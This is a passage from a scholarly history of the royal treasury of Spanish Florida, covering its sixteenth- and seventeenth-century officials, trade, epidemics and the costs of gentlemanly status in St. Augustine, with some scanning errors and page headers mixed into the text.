guarded the king's investment, if any, in weapons and supplies and disposed of tribute in kind. An overseer of barter and trade (veedor de rescates y contrataciones) saw to commercial contacts with the natives and in case of war claimed the king's share of booty. An accountant (contador) recorded income and outgo and was the guardian and interpreter of royal instructions. A treasurer (tesorero) was entrusted with monies and made payments in the king's name. If the expedition resulted in a permanent settlement these officials continued their duties there, protecting the interests of the crown in a new colony.'1 *Notes begin on page 151. 2 The King's Coffer There was a strongly commercial side to these earliest treasuries, supervised after 1503 by the House of Trade (Casa de Contratacion) in Seville. The factor in particular served as the House's representative, watching the movement of merchandise and seeing that the masters of ships enforced the rules against unlicensed passengers and pro- hibited goods. He also engaged in active and resourceful trading, exchanging the royal tributes and taxes paid in kind for necessary supplies. In 1524 the newly created Council of the Indies (Consejo de Indias) assumed the supervision of overseas treasuries, a duty it retained throughout the Habsburg period except for the brief interval of 1557-62. By 1565, founding date of the treasury under study, Spanish presence in the Indies was seventy-three years old. The experimental stage of government was past; institutions of administration had taken more or less permanent shape. A network of royal treasuries existed, some subordinate to viceroyalties or presidencies and others fairly independent. Principal treasuries with proprietary officials were located in the capital cities; subordinate treasuries staffed by lieutenants were at seaports, mining centers, or distant outposts. The factor had become a kind of business manager; administering tributes and native labor. The overseer's original functions were forgotten as the crown turned its attention from commerce and conquest to the dazzling wealth of mines. As a result of the overriding interest in precious metals, overseers were confined to duty at the mints; in places without a mint their office was subsumed under the factor's. And wherever there was little revenue from tribute the factorship was disappearing as well. The treasury of Florida had its beginnings in a maritime enter- prise. This was no haphazard private adventure, but the carefully organized joint action of a corporate family and the crown.2 Pedro Menendez de Avil6s was a tough, corsairing Asturian sea captain known to hold the interests of his clan above the regulations of the House of Trade, but the king could not afford to be particular. In response to French settlement at Fort Caroline, Philip II made a three-year contract (capitulacion) with Menendez, naming him Adelantado, or contractual conqueror; of Florida. At his own cost, essentially, Men6ndez was to drive out Ren6 de Laudonniere and every other interloper from the land between Terra Nova (New- foundland) and the Ancones (St. Joseph's Bay) on the Gulf of The Florida Provinces and Treasury 3 Mexico. Before three years were out he was to establish.two or three fortified settlements and populate them.3 He did all of this, but as the French crisis escalated, the king had to come to his support.4 During the three years of the contract Menendez and his supporters invested over 75,000 ducats; the crown, more than 208,000 ducats, counting Florida's share of the 1566 Sancho de Archiniega reinforcements of 1,500 men and seventeen ships.5 Despite the heavy royal interests, the new colony was governed like a patrimonial estate. The adelantado nominated his own men to treasury office: his kinsman Esteban de las Alas as treasurer, his nephew Pedro Menendez Marquez as accountant, and a future son- in-law, Hernando de Miranda, as factor-overseer This was open and honorable patronage, as Menendez himself said: "Now, as never before, I have need that my kinfolk and friends follow me, trustwor- thy people who love me and respect me with all love and loyalty."6 It was also an effort to settle the land, as he once explained: They are people of confidence and high standing who have served your Majesty many years in my company, and all are married to noblewomen. Out of covetousness for the offices [for which they are proposed], and out of love for me, it could be that they might bring their wives and households. Because of these and of others who would come with their wives, it is a fine beginning for the population of the provinces of Florida with persons of noble blood.7 Since there were as yet neither products of the land to tax nor royal revenues to administer; these nominal officials of the king's coffer continued about their business elsewhere: Las Alas governing the settlement of Santa Elena (on present-day Parris Island), Miranda making voyages of exploration, and Menendez Marquez governing . for his uncle in Cuba. With most of the rest of the clan they also served in the new Indies Fleet (Armada Real de la Guardia de las Costas e Islas y Carrera de las Indias) that Pedro Menendez built in 1568, brought to the Caribbean, and commanded until 1573. From 1570 to 1574 the fiscal officers of that armada were the acting ir. als forlorida, wooosel ysuperyii h is records and nm Lyj li s.th .rio gisons They would not consent to live there.8 Meanwhile, the king issued Miranda and The King's Coffer Menendez Marquez their long-awaited titles. Las Alas, under inves- tigation for withdrawing most of the garrison at Santa Elena and taking it to Spain, was passed over in favor of a young nephew of the adelantado's called variously Pedro Menendez the Younger and the Cross-Eyed or One-Eyed (El Tuerto). Of the three royal appointees Pedro was the only one to take up residence.9 The others continued to name substitutes. Because it established claim by occupation to North America from the Chesapeake Bay southward, Florida was an outpost of empire to be maintained however unprofitable. Any one of its un- explored waterways might be the passage to the East. With this in mind, Philip II had renewed the Menendez contract when it expired, letting the subsidy for the Indies fleet cover the wages for 150 men of the garrisons. Three years later; in 1570, the king changed this provi- sion to give Florida a subsidy of its own.10 Despite this underwriting of the colony the adelantado remained to all purposes its lord proprie- tor. When he died in 1574, acting governorship shifted from his son-in-law Diego de Velasco to the already-mentioned Hernando de Miranda, husband of Menendez's one surviving legitimate heir. In 1576 the Cusabo Indian uprising resulted in the massacre of Pedro Menendez the Younger and two other treasury officials. Governor Miranda abandoned the fort at Santa Elena and returned to Spain to face charges of desertion.11 Once more the king came to the rescue, doubling the number of soldiers he would support.12 Florida began the slow shift from a proprietary colony to a royal one. The only person considered capable of holding the provinces against heretic and heathen alike was Admiral Pedro Menendez Marquez, awaiting sentence for misdeeds as lieutenant-governor of Cuba. The Council granted him both a reprieve and the acting governorship of Florida, and he sailed for St. Augustine. Along with the three new appointees to the treasury, he had permission to pay himself half his salary from the yearly subsidy, or situado,13 The provinces that he pacified did not remain quiet for long. In 1580 a French galleass entered the St. Johns estuary for trade and informa- tion. Menendez Marquez took two frigates to the scene and defeated the Frenchmen in the naval battle of San Mateo. Four years later the Potano Indians of the interior staged an uprising and were driven from their homes.14 Sir Francis Drake stopped by St. Augustine long enough to burn its two forts (the fifth and the just-finished sixth) and 4 The Florida Provinces and Treasury 5 the town, which is why subsequent financial reports gave no figures earlier than 1586, "the year the books were burned." To consolidate their forces the Spanish again abandoned Santa Elena, and this time did not go back. 15The twelve Franciscans who arrived in 1587 ready to commence their apostolic mission found Spanish settlement contracted to a single outpost.16 In these first uncertain years the presidios (garrison outposts) were little more than segments of an anchored armada, supported but not rigorously supervised by the crown. The sixteenth-century gover- nors, who could be called the "Asturian Dynasty," filled the little colony with family intrigues and profiteering. All the officers, treas- ury officials included, were captains of sea and war who could build a fort, command a warship, smuggle a contraband cargo, or keep a double set of books with equal composure. Juan de Posada, for instance, was an expert navigator who sometimes doubled as lieuten- ant governor for his brother-in-law Pedro Menendez Marquez. He once calculated for the crown that a good-sized galley, a 100-man fort, or four frigates would all cost the same per year: 16,000 ducats. Posada was bringing back a title of treasurer for himself in 1592 when his ship sank and he drowned off the Florida coast, which he had once called easy sailing.17 As the orders instituting the situado in 1570 explicitly stated that troops in Florida were to be paid and rationed the same as those in the Menendez fleet or the Havana garrison, the first royal officials mod- eled themselves after their counterparts in the king's armadas and garrisons rather than his civilian exchequers.18 Treasurer Juan de Cevadilla and Accountant Lazaro Saez de Mercado, taking office in 1580, thought that this system allowed the governor undue power. It was not appropriate to transfer all the fiscal practices from the ar- madas, they said, when "the exchequer can be looked after better on land than on sea."19 Auditor Pedro Redondo Villegas, who came in 1600, refused to accept any armada precedent without a cedula (writ- ten royal order) applying it to Florida.20 Thereafter the officials compared their treasury with wholly land-based ones and demanded equal treatment with the bureaucrats of Peru, Yucatan, Honduras, and the Philippines. As payroll and supply officers for a garrison, however they continued to envy the Havana presidio's royal slaves and the new stone fort built there between 1558 and 1578.21 During the course of the seventeenth century, the treasury at St. The King's Coffer Augustine built up precedents that achieved the practical force of law. Cedulas from the crown were respectfully received and recorded, but not necessarily implemented. In this the officials followed the ancient principle of"I obey but do not execute" ("obedezco pero no cumplo"), a form of particularism expounded for the adelantado in 1567 by his friend Francisco de Toral, Bishop of Merida: For every day there will be new things and transactions which will bring necessity for new provisions and new remedies. For the General Laws of the Indies cannot cease having mild interpretations, the languages and lands being different, inas- much as in one land and people they usually ignore things in conformity to the times. Thus it will be suitable for your lordship to do things there [in Florida] of which experience and the condition of those natives have given you under- standing.22 The Florida creoles, born in the New World of Spanish parents, referred to long custom to justify their actions, and this argument was taken seriously.23 The Franciscan commissary general for the Indies, writing the year after publication of the great Recopilacion de leyes de los Reynos de las Indias, observed that some practices in the Indies were not amenable to change after so long a time.24 Perhaps it was only right that there should be flexibility in the application of laws. Florida was an exception to the usual colony. It had been founded for reasons of dynastic prestige, and for those reasons it was maintained, at a cost out of all proportion to benefits received. The colony did not mature beyond its initial status of captaincy general. It was a perennial military frontier that was never under the Habsburgs, absorbed by another administrative unit. The governors were military men with permanent ranks of admiral, captain, sergeant major or colonel, who took orders from the Coun- cil and the Junta de Guerra (Council of War) alone. It was a dubious distinction, for wartime coordination with New Spain or Havana depended upon mutual goodwill rather than any sense of obligation. The French, when not at war with the Spanish, made more reliable allies.25 In his civil role the governor answered neither to the audiencia (high court and governing body) in Santo Domingo nor the one in 6 The Florida Provinces and Treasury 7 Mexico City, and he took orders from no viceroy. In the seventeenth century the crown moved with majestic deliberation to establish the authority, first of the Audiencia of Santo Domingo, then that of Mexico City, over civil and criminal appeals; responsibility for treasury audits was handed back and forth between the Mexico City Tribunal of Accounts and the royal auditor in Havana. These meas- ures did not affect the Florida governorship, which remained inde- pendent. As Governor Marques Cabrera explained more than once, no audiencia cared to be responsible for poor frontier provinces. Distances were great, navigation was perilous, and ministers were unwilling to make the journey. 26 If mines of silver had been found within its borders, New Spain would have annexed Florida without delay. Not everyone was satisfied with a separate status. The friars thought that prices would be lower if the governor were subject to some viceroy or audiencia (or were at least a Christian). And royal officials grumbled that there was little point in the king's having appointed them to a republic of poor soldiers, in which the governor disregarded his treasury officials and answered to no audiencia.27 For their own reasons, the accountant, treasurer and factor often made the governor look more autocratic than he was. Florida may not have been a popular democracy, but neither was it a dictatorship. There were within th community carefully drawn class distinctions based on inequalities of state din_ e n the officials ofthe treas were gentlemen, expecting and receiving the honQrs.ueAo their class. They were not mere quartermasters on the governor's staff As proprietors of treasury office and judges of the exchequer they were his quasi-peers, and as titled councilmen of the one Spanish city in Florida they were his civil advisory council, just as the sergeant major and captains were his council of war and the priests and friars his ecclesiastical counselors. The governor who ignored the advice of these men of experience was spoken of disparagingly as "carried off by his own opinions." The royal treasury of St. Augustine differed from the ones elsewhere mainly in that it had fewer revenues. For various reasons, t)e..com^L Florida never approached that op s, or productive region. European settlement there, however earlyby North American standards, had gotten a late start in Sanish terms. In the rest of the Indies, debate had been going on for years about Indian rationality, just wars and slavery, forced conversions, en- 8 The King's Coffer comiendas (allotments of tribute or service), and the alienationof native lands-and while theologians and lawyers argued, soldiersand settlers exploited. By the time the florida conquest began these questions were more or less settled. Although not advanced enough to be subject to the Inquisition, the Indian had beendetermined a rational being. He could not be held in servitude or have his lands taken. It was forbidden to enter his territory with arms and banners or to resettle him anywhere against his will.28 Florida was to be conquered through the Gospel-not the fastest way. As five Apalachicola chiefs once courteously told Governor Marques Ca- brera, if God ever wished them and their vassals to become Chris- tians they would let the governor know.29 Pacifying the natives by trade was not effective either; for the Spanish could maintain no monopoly. For over forty years the French continued to trade in Florida, and the Indians preferred them. In a single summer fifteen French ships were sighted off the coast of Guale, coming into the Savannah River for pelts and sassafras.30 Dutch and English interlopers bartered with the adamantly inde- pendent Indians ofAis, Jeaga, and the Carlos confederacy to the south for amber and the salvaged goods of shipwrecks.31 The Spanish crown no longer encouraged Indian trade in the late sixteenth century anyhow; it barely permitted it. St. Augustine was a coast guard station, a military base, and a mission center, not a commercial colony, and the government saw no reason to supply sailors, soldiers, and friars with trade goods. When Governor Mendez de Canzo made peace with the Guale Indians in 1600 the treasurer observed for the royal benefit that it was to be hoped the governor was acting out of a zeal for souls and His Majesty's service and was not influenced by the good price for sassafras in Seville.32 Pious disclaimers aside, Florida's colonists and governors did not agree with His Majesty's restrictions on Indian trade. The natives had many things that Spaniards wanted: sassafras, amber, deer and buf- falo skins, nut oil, bear grease, tobacco, canoes, storage containers, and, most of all, food. And the Indians soon wanted what the Spanish had: weapons, construction and cultivation tools, nails, cloth, blan- kets, bells, glass beads, church ornaments, and rum. The problem was not to create a market but to supply it. When the amber-trading Indians demanded iron tools Governor Rebolledo made them from 60 quintals (6,000 pounds) of the presidio's pig iron, plus melted The Florida Provinces and Treasury down cannons and arquebuses.33 The 1,500-ducat fund that the king intended for gifts to allied chiefs, the governors sometimes diverted to buy trade goods. Soldiers, having little else, exchanged their firearms; the Cherokees living on the Upper Tennessee River in 1673 owned sixty Spanish flintlocks. Without royal approval, however, there was a limit to the amount of trading that could be done, and the crown favored the regular commerce of the fleets and New Spain. Throughout the Habsburg period Florida was licensed to send no more than two frigates a year to Seville or the Canaries, and a bare " 2,000 to 3,000 ducats' worth of pelts.34 The English who colonized in NortA ericasufferednosuch handicaps. As early as 1678, four ships at a time could be seen in the Charles Town harbor; at St. Augustine the colonists would have been happy to receive one a year from Spain.35 Later on, when the English wanted in trade Hispanic Indian slaves or scalps, they had the wherewithal to pay for them. For a single scalp brought to the Carolina governor one warrior was supposedly given clothing piled to reach his shoulders, a flintlock with all the ammunition he wanted, and a barrel of rum.36 The Indians of the Southeast shifted to the English side with alacrity. The bishop of Tricale reported in 1736 that natives who had been baptized Catholic put their hands to their heads saying, "Go away, water! I am no Christian."37 Protected Indians, limited exports, and a shortage of trade goods were only three of the factors hampering normal economic growth in Florida. Another was the continuing silver rush to New Spain and Peru. St. Augustine was not the place of choice for,a Spanish immi- grant. Soldiers and even friars assigned to Florida had to be guarded in the ports en route to keep them from jumping ship. In this sense the other North Atlantic colonies were again more fortunate. There were no better places for Englishmen, Scots, and Germans to go. Ideally the presidio of St. Augustine should have been supplied through the free competition of merchants bringing their shiploads of goods to exchange for the money to be found in the king's coffer and the soldiers' wallets.38 It did not work out this way for several reasons. Under the Habsburgs the situado for Florida soldiers and friars never rose above 51,000 ducats or 70,000 pesos a year; payable from 1592 to 1702 from the Mexico City treasury.39 But supporting presidio in Florida was not one of that treasury's priorities. The Mexico City officials paid the situado, lrregurarly iand piecemeal. For 9 The King's Coffer a merchant, selling to the Florida presidio was equivalent to making a badly secured, long-term loan. The king, whose private interests might conflict with the national or general interest, once had all the Caribbean situados sequestered and carried to him in exchange for promissory notes.40 Sometimes an entire situado would be mort- gaged before it arrived, with creditors waiting on the Havana docks. In order to be supplied at all, St. Augustine was forced to take whatever its creditors would release: shoddy, unsuitable fabrics and moldy flour. The presidio was chronically in debt, and so was everyone dependent on it. Soldiers seldom saw money; Indians almost never used it.41 St. Augustine was a poor and isolated market with little to export. Its seaways were beset by corsairs in summer and storms in winter. No merchant could risk one of his ships on that dangerous journey without an advance contract guaranteeing the sale of his cargo at a profit of 100 to 200 percent.42 Citizens sometimes tried to circumvent the high cost of imports by going in together to order a quantity of goods, making sure that anyone they entrusted with money had local ties to guarantee his return. But the price of bringing goods to Florida was still prohibitive. A single frigate trip to the San Juan de Uhia harbor and back cost 400 ducats.43 It was of little help to be located along the return route of the Fleet of the Indies. Once a year the heavily laden galleons sailed northward in convoy just out of sight of land, riding the Gulf Stream up the Bahama Channel to Cape Hat- teras to catch the trade winds back to Spain, but the St. Augustine harbor, with its shallow bar which would pass only flat-bottomed or medium portage vessels, was not a place where these great 500- to 1,500-ton ships could anchor nor would they have interrupted their progress to stop there. When the Floridians wished to make contact with a vessel in the fleet they had to send a boat to await it at Cape Canaveral, a haunt of pirates.44 By Spanish mercantilist rules nothing could be brought into a Spanish port except in a licensed ship with prior registration. At times the presidio was so short on military and naval supplies that the governor and officials waived the regulations and purchased artillery and ammunition, cables and canvas off a ship hailed on the open seas; or a foreign merchantman entered the harbor flying a signal of distress, news bearing, or prisoner exchange, and sold goods either openly or under cover45 10 The Florida Provinces and Treasury Except for trade goods, metals, and military accoutrements, which always had to be imported, St. Augustine with its hinterland was surprisingly self-sufficient.46 The timber; stone, and mortar for construction were available in the vicinity; nails, hinges, and other hardware were forged in the town. Boats were built in the rivers and inlets. There was a gristmill, a tannery, and a slaughterhouse. Fruits, vegetables, and flowers grew in the gardens; pigs and chickens ran in the streets. Although it was a while before cattle ranching got started, by the late seventeenth century beef was cheap andplentiful.47 The swamps and savannahs provided edible roots, wild fruit, and game; lakes and rivers were full offish; oysters grew huge in the arms of the sea. Indians paddling canoes or carrying baskets brought their pro- duce; but especially they brought maizec Maize, not wheat~ as the staff of life in Florida. The poor; the slaves, the convicts and Indians all got their calories from it. When the maize crops were hurt, St. Augustine was hungry. But the problem was not so much supply as distribution. After the Indians were reduced to missions the friars had them plant an extra crop yearly as insurance against famine and for the support of the poor and beautifi- cation of the sanctuaries. The missionaries were highly incensed to have this surplus claimed for the use of the presidio, yet to guarantee an adequate supply the governor was ready to take desperate meas- ures: raid the church granaries, even plant maize within musket range of the fort, providing cover to potential enemies. Each province presented its problems. The grain from Guale was brought down in presidio vessels. That from Timucua was carried 15 to 30 leagues on men's backs for lack of mules or packhorses, and it was easier to bring in relays of repartimiento (labor service) Indians and raise it near the city. The inhabitants of Apalache had a ready market for maize in Havana, and the governor had to station a deputy in San Luis, their capital, to collect it and transmit it 2,000 miles around the peninsula to St. Augustine. To read the hundreds of letters bemoaning the tardiness or inade- quacy of the situado, one would suppose that the presidio was always about to starve. This was largely rhetoric, an understandable effort by 11 The King's Coffer the governors and royal officials to persuade His Majesty to take the support of his soldiers seriously. Florida was not so much dependent upon the subsidy as independent because the subsidy was unreliable. Supply ships were sometimes years apart, and not even a hardened Spaniard could go for years without eating.48 He might miss his olive oil, wheat flour; wine, sugar; and chocolate, but there was some sort of food to be had unless the town was suffering famine or siege and had exhausted its reserves. Such exigencies happened. After the attacks of buccaneers caused the partial abandonment of Guale Province in the 1680s, the maize source there dried up, while refugees increased the number of mouths in St. Augustine. Without pro- visions the militia and Indian auxiliaries could not be called out, nor repartimiento labor be brought in to work on the fortifications.49 Food reserves were a military necessity, and the governor and cabildo (municipal council) had emergency powers to requisition hoards and freeze prices.50 Toaggravate the economic problems,. the colony was almost never at peace. The peninsula could not be properly explored; as late as 1599 there was uncertainty over whether or not it was an island. Throughout the Habsburg era there were two fluctuating frontiers with enemies on the other sides, for; converted or not, Florida Indians saw no reason to halt their seasonal warfare. From the south, Ais, Jeaga, Tocobaga, Pocoy, and Carlos warriors raided the Hispanicized Indians; Chisca, Chichimeco, Chacato, Tasquique, and Apalachicolo peoples were some of the enemies to the north and northwest. The coasts were no safer In 1563, trading and raiding corsairs conducting an undeclared war were driven by Spanish patrols from the Antilles to the periphery of the Caribbean: the Main, the Isthmus, and Florida. The French crisis of1565-68 was followed by the Anglo-Spanish War of 1585-1603 and the Dutch War of 1621-48.51 Meanwhile, Floridians watched with foreboding the rival settlements of Virginia, Barbados, and, after 1655, Jamaica. When Charles Town was founded in 1670 they pleaded for help to drive off the colonists before there were too many, but the crown's hands were tied by a peace treaty, and its reaction-the building of a fort, the Castillo de San Marcos in St. Augustine-was essentially defensive. During the sixteenth and seventeenth centuries Florida was afflicted by a severe demographic slump which reached nadir in 1706. 12 The Florida Provinces and Treasury The first European slavers probably reached the peninsula with their pathogens and iron chains in the 1490s.52 As there is little basis for estimating the population at contact, there is no way of knowing what the initial demographic loss may have been, nor its dislocating effects.53 At the end of the sixteenth century Bartolome de Argiielles, who had been in Florida twenty-four years and traversed it from Santa Elena to the Keys, said it was his impression that there were relatively few natives.54 -- The first epidemic reported among mission Indians was in 1570; the next, in1591. Th-e "pests and contagions," lasting from 1613 to 1617, to the best of the friars' knowledge killed half the Indians in Florida.55 An incoming governor marveled in 1630 at the way "the Indians... die here as elsewhere."56 Six years later the friars reported that the natives between St. Augustine and Guale were almost totally gone. The Franciscans obtained gubernatorial consent to enter the province of Apalache partly because the depopulating of nearer provinces had depleted the Spanish food and labor supply. When Interim Governor Francisco Menendez Marquez suppressed a rebel- lion of the Apalaches in 1647 and condemned loyal and rebel alike to the labor repartimiento, he explained that the other provinces of Christians were almost used up.57 The worst years were yet to come. Between 1649 and 1659 three epidemi-cs descended on Florida: the first was either typhus or yellow fever the second was smallpox, and the last, the measles. Governor Aranguiz y Cotes said that in the seven months after he took posses- sion in February of 1659, 10,000 Indians died. These were also the years of famine and of the Great Rebellion of the Timucuans, which left their remnants scattered and starving.58 From 1672 to 1674 an unidentified pestilence reduced the population even further. There were so few Indians in Central Florida that the Spanish gave land in Timucua Province to anyone who would introduce cattle. As native town structure broke down under the barrage of disasters, Indians began detaching themselves from their families and parishes to work as day labor in construction and contract labor on the ranches, or as independent suppliers of some commodity to the Spanish: charcoal, wild game, baskets, or pots. Efforts to make this migratory labor force return home to their family, church, and repartimiento respon- sibilities were largely ineffective. In 1675 a governor's census showed 13 The King's Coffer only 10,766 Indians under Spanish obedience in all Florida, and four-fifths of them were in Apalache, 200 miles from St. Augustine across a virtually empty peninsula.59 Some people were managing to profit by the situation. The Florencia family had led in the opening up and settling of Apalache Province and were the ones who had started trade from there to Havana. Descended from a Portuguese pilot who came to Florida in 1591, for three generations they supplied most of Apalache's deputy governors and many of its priests, treating the province as a private fief. A look at the names of provincial circuit judges and inspectors (visitadores) shows that these ingenious Floridians even cornered the market on investigating themselves.60 Under their instigation, Apalache was considering breaking off administratively from the capital of Florida. The Florencias, the friars, and the Hispanic Indians all preferred to deal with Havana, only a week's sail from them and offering more opportunity.61 Whether this would in time have hap- pened, and what would then have become of St. Augustine, is a moot point. Colonel James Moore of Carolina and his Creek allies took advantage of the outbreak of Queen Anne's War in 1702 to mount slave raids against the Indians of Florida. By 1706 the raids had reduced the native provincial population to a miserable few hundred living beneath the guns of the fort.62 SIn thefacePofthe manyhindrances to the settlement and effective use of Florida-the crown's protective attitude toward natives, the obstacles to trade, the shortage of currency, the problems of food distribution, the slow Spanish increase in population and the rapid native decrease, and the exhausting wars-it was a remarkable achievement for the Spanish to have remained there at all!lThe way they did so, and the share of the royal officials of the treasury in the story, is a demonstration of human ingenuity and idealism, tenacity, and sheer greed. 14 2 The Expenses of Position U LORIDA, with its frequent wars, small Spanish population, and J relatively few exports, might not seem a likely place for the maintenance of a gentlemanly class, known to Spaniards as hidalgos. But wealth and position are relative, and people differentiate them- selves wherever there are disparities of background or belongings to be envied or flaunted. In the small society of St. Augustine, where everyone's business was everyone else's concern, social presump- tiveness was regarded severely.1 One of the grievances against Gov- ernor M6ndez de Canzo was that he had named one of his relatives, a common retail merchant, captain of a company and let him appoint as ensign a lad "of small fortune" who had been working in the tannery.2 From the list of vecinos (householders) asked to respond with voluntary gifts for public works or defense construction we can identify the principal persons in town, for avoluntarygift was the hidalgo's substitute for personal taxation, to which he could not submit without marking himself a commoner When Governor Hita Salazar needed to put the castillo into defensible order he gave the first 200 pesos himself, to put the others under obligation, and then collected 1,600 pesos from the royal officials of the treasury, the sergeant major, the captains, other officers and those receiving bonuses, and some private individuals who raised cattle.3 Whether transferred to Florida from the bureaucracy elsewhere or coming into office via inheritance, the royal official was presumed to be an hidalgQ or he would never have been appointed. This meant, 15 The King's Coffer technically, that he was of legitimate birth, had never been a shop- keeper or tradesman, had not refused any challenge to his honor and could demonstrate two generations of descent from hijos de algo ("sons of something") untainted by Moorish or Jewish blood and uncondemned by the Inquisition. The advantages of being an hidalgo someone addressed as don in a time when that title had significance were unquestioned. There were, however concomitant responsibilities and expenses. A gentleman was expected to "live decently," maintaining the dignity of his estate whether or not his means were adequate. Openhanded- ness and lavish display were not the idiosyncracies of individuals but the realities of class, the characteristics that kept everyone with pretensions to hidalguia searching for sources of income. The personal quality that St. Augustine appreciated most ear- nestly in a gentleman was magnanimity. The character references written for a governor at the end of his term emphasized alms: the warm shawls given to widows, the delicacies to the sick, and the baskets of maize and meat distributed by the benefactor's slaves during a famine. They also stressed his vows fulfilled to the saints: silver diadems, fine altar cloths, and new shrines.4 When local con- fraternities elected yearly officers, the governor and treasury officials were in demand, for they brought to the brotherhood gifts and favors besides the honor of their presence. The royal officials consistently turned over a third of their earnings from tavern inspections to the Confraternity of the Most Holy Sacrament, and the treasurer gave it his payroll perquisites.5 Alms and offerings were minor expenses compared to the cost of keeping up a household. The royal officials were admonished to be married; the crown wanted the Indies populated by citizens in good standing, not mannerless half-breeds, and a man with a family had given as it were hostages for his behavior.6 Regular marriage to someone of one's own class was, however expensive. According to one hard-pressed official, "The pay-of a soldier will not do for the position of quality demanded of a treasurer" Another argued that he needed a raise because his wife was "someone of quality on account of her parents."7 A woman of quality in one's house had to be suitably gowned. In 1607 six yards of colored taffeta cost almost 9 ducats, the equivalent of 96 wage-days for a repartimiento Indian. A velvet gown would have 16 The Expenses of Position cost 48 ducats.8 A lady wore jewels: ornaments on her ears and fingers, and necklaces. In 1659 a single strand of pearls was valued at 130 pesos. Between wearing the jewelry was kept in a locked case inside the royal coffer, which served the community as a safety deposit.9 A lady had female companions near her own rank-usually dependent kinswomen, although Governor Menendez Marquez introduced two young chieftainesses to be raised in his house and to attend his wife, dofia Maria.10 A gentlewoman maintained her own private charities; Catalina Menendez Marquez, sister of one gov- ernor, niece of another, widow of two treasury officials and mother-in-law of a third, kept convalescent, indigent soldiers in her home.11 The wives and daughters of hidalgos could become imperi- ous: Juana Caterina of the important Florencia family, married to the deputy governor of Apalache Province, behaved more like a feudal chatelaine than the wife of a captain. She required one native to bring her a pitcher of milk daily, obliged the town of San Luis to furnish six women to grind maize at her husband's gristmill, and slapped a chief in the face one Friday when he neglected to bring her fish.12 A gentlewoman's dowry was not intended for household ex- penses but was supposed to be preserved and passed on to her chil- dren. Debts a husband had incurred before marriage could not be collected from his wife's property nor was he liable for debts inher- ited from her family. A gentlewoman kept her own name as a matter of course, and if her family was of better quality than her husband's it was her name that the children took.13 Families were large-Lseena r eight persons, it was estimated around 1706.14 The four generations of the Menendez Marquez treasury officials are one example. In the first generation fourteen children were recorded in the Parish Regis- ter (all but two of them legitimate). In the second generation there were ten; in the third, nine; and the fourth generation numbered six. The number of recognized, baptized children in the direct line of this family averaged nearest to ten.15 All of the hidalgo's progeny, legitimate or illegitimate, had to be provided for. The daughters, called "the adornments of the house," had to have dowries if they were not to spend their lives as someone's servants. A common bequest was a sum of money so an im- poverished gentlewoman could marry or take the veil. Pedro Menendez de Aviles for this purpose endowed five of his and his 17 The King's Coffer wife's kinswomen with 200 to 300 ducats each.16 The usual dowryjn St. Augustine was a house for the bride, but it could also be a ranch,a. soldier's plaza(man-space or man-pay) in the garrison, or even a royal office. Juan Menendez Marquez became treasurer when he was betrothed to the daughter of the former treasurer Nicolas Ponce de Le6n II became sergeant major by marrying the illegitimate daughter of Sergeant Major Eugenio de Espinosa.17 If a man died before all his daughters had been provided for, that duty fell upon their eldest brotlier; even if a friar. Girls were taught their prayers, manners, and accomplishments, and they learned homemaking at their mother's side; they seldom received formal schooling. When two young ladies from St. Augustine were sent to be educated at the convent of Santa Clara in Havana, the question of the habit they were to wear was so unprecedented that it was referred to the Franciscan commissary general for the Indies.18 The plan for the sons of the family was to make them self- supporting. Once a boy had finished the grammar school taught by one of the friars he had two main career options: the church or the garrison. To become a friar he entered a novitiate at the seminary in St. Augustine, if there was one in operation-otherwise, in Santiago de Cuba or Havana. He was then given his orders and joined the missionary friars in the Custody or Province of Santa Elena, em- bracing both Cuba and Florida.19 If he was meant for a soldier his father purchased or earned for him a minor's plaza, held inactive from the time he got it at age nine or ten until he started guard duty around fifteen or regular service two years later Whether as friar or as soldier the young man was paid a meager 115 ducats a year including rations-enough for him to live on modestly but not to support dependents. Even so, there were governors who felt that no one born in Florida should be on the government payroll, either as a religious or as a fighting man.20 Advancement cost money, whether in the church, the military, or the bureaucracy. A treasury official generally trained his eldest son to succeed him and bought afutura (right of succession) if he could.21 The patronage of lesser offices was an important right and, if the family possessed any, every effort was made to keep them. When times were peaceful, markets favorable, and other conditions fell into line, an hidalgo might set up his son as a rancher or a merchant in the import-export business, but many sons of hidalgos found none of 18 The Expenses of Position these careers open to them. Sometimes, they were deposited with relatives in New Spain or Cuba; they left Florida of their own accord to seek their fortunes; or they remained to form the shabby entourage of more fortunate kinsmen, serving as pages, overseers, skippers, or chaplains.22 Sixteenth-century property inventories studied by Lyon show that the contrast between social classes around 1580 appeared in costly furnishings and apparel rather than houses. It made sense, in a city subject to piracy and natural disasters, to keep one's wealth portable, in the form of personal, not real, property. The goods of an hidalgo included silver plate, carpets, tapestries and leather wall hangings, linens and bedding, rich clothing, and writing desks. The value of such belongings could be considerable. Governor Trevifio Guillamas once borrowed 1,000 pesos against the silver service of his house. 23 During the seventeenth century, houses gradually became a more important form of property. Construction costs were modest. Tools and nails, at five to the real (one-eighth of a peso), were often the single largest expenditure.24 At mid-century it cost about 160 pesos to build a plain wattle-and-daub hut; a dwelling of rough planks and palmetto thatch rented for 3 pesos a month. Indian quarrymen, loggers, and carpenters were paid in set amounts of trade goods originally worth one real per day. When the price of these items went up toward the end of the seventeenth century, the cost of labor rose proportionately but was never high.25 Regidores set the prices on lots and it is not certain whether these prices rose, fell, or remained stable. Shipmaster and Deputy Governor Claudio de Florencia's empty lot sold for 100 pesos after he and his wife were murdered in the Apalache rebellion. Captain Antonio de Argiielles was quoted a price of 40 pesos on what may have been a smaller lot sometime before 1680, when the lot on which the treasurer's official residence stood was subdivided.26 The value of better homes in St. Augustine rose faster than the cost of living during the seventeenth century, perhaps indicating houses of larger size or improved quality. In 1604 the finest house in town was appraised at 1,500 ducats and sold to the crown for 1,000 as the governor's residence.27 The governor's mansion that the English destroyed in 1702 was afterward appraised at 8,000 pesos (5,818 ducats). In that siege all but twenty or thirty of the cheaper houses 19 The King's Coffer were damaged irreparably; 149 property owners reported losses totaling 62,570 pesos. The least valuable houses ran 50 to 100 pesos; the average ones, 200 to 500 pesos. Arnade mentions eight families owning property worth over 1,000 pesos, with the most valuable private house appraised at 6,000.28 Royal officials were entitled to live in the government houses, but in St. Augustine they did not always choose to. After the customs- counting house and the royal warehouse-treasury were complete, and even after the treasury officials obtained permission to build official residences at royal expense, they continued to have other houses. The Parish Register records one wedding at the home of Accountant Thomas Menendez Marquez and another in the home of his wife. Their son Francisco, who inherited the position of account- ant, owned a two-story shingled house which sold for 1,500 pesos after he died.29 In St. Augustine, houses were set some distance apart and had surrounding gardens. The grounds were walled to keep wandering animals away from the well, the clay outdoor oven, and the fruit trees, vines, and vegetables.30 